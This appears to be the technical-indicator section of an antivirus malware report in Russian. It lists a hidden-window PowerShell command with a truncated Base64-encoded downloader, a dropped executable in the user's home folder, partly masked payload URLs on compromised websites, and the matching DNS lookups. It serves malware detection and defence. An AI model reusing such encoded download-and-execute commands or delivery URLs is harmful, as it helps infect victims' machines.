Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AXwAxADMANgA0ADIAPQAoACcAcgBfADEAJwArACcAMQA3ACcAKwAnADUAXwAnACkAOwAkAGIAXwAxADkAMQA3ADgAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAagAxAF8AMAAwADYANwA9AC...
- %HOMEPATH%\581.exe
- %HOMEPATH%\581.exe
- %HOMEPATH%\581.exe
- http://cp###ech.com/XoSu0UFgeRod5G
- http://cp###ech.com/cgi-sys/suspendedpage.cgi
- http://pa###nstore.com/alYc5u7PCe_w
- http://ha#####shcompany.com/2vqObycriG
- http://mi####tfoods.com/wp-content/odbfx8yt_5yvdgPL6
- http://ng####dachung.com/wp-includes/baxKC0aEHBtA_Hhay4
- DNS ASK cp###ech.com
- DNS ASK pa###nstore.com
- DNS ASK ha#####shcompany.com
- DNS ASK mi####tfoods.com
- DNS ASK ng####dachung.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AXwAxADMANgA0ADIAPQAoACcAcgBfADEAJwArACcAMQA3ACcAKwAnADUAXwAnACkAOwAkAGIAXwAxADkAMQA3ADgAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAagAxAF8AMAAwADYANwA9AC...' (со скрытым окном)